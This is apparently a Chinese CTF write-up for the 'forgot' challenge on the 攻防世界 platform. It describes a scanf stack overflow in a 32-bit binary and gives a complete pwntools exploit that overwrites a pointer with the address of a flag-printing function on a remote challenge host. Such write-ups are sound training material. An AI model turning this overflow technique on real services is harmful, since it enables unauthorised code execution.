攻防世界2

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
企业对冲系统官6 分钟前
大宗商品风险对冲系统统计分析功能的技术实现
运维·python·算法·区块链·github·pygame
Web极客码8 分钟前
如何在WordPress登录页面添加隐藏或显示密码按钮
运维·服务器
曹天骄16 分钟前
Cloudflare Worker vs 阿里云 DCND:回源次数、链路结构与真实性能对比
运维·阿里云·云计算
haluhalu.32 分钟前
[特殊字符] 深入理解Linux信号机制:信号的产生,保存和捕捉
linux·运维·服务器
JY.yuyu36 分钟前
Linux磁盘管理 / 硬盘分区、创建逻辑卷
linux·运维·服务器
云和数据.ChenGuang1 小时前
运维故障之MySQL 连接授权错误
运维·数据库·人工智能·mysql
~黄夫人~1 小时前
Kubernetes Pod 初始化容器(InitContainer)起不来的排错思路
linux·运维·服务器
运维有小邓@2 小时前
如何在 Linux 中查看系统日志消息
linux·运维·服务器
TroubleBoy丶2 小时前
麒麟V10-ARM架构Docker启动报错
运维·docker·容器·arm·麒麟v10
Allen-Steven2 小时前
群辉NAS 部署小雅 SSH指令版
运维·ssh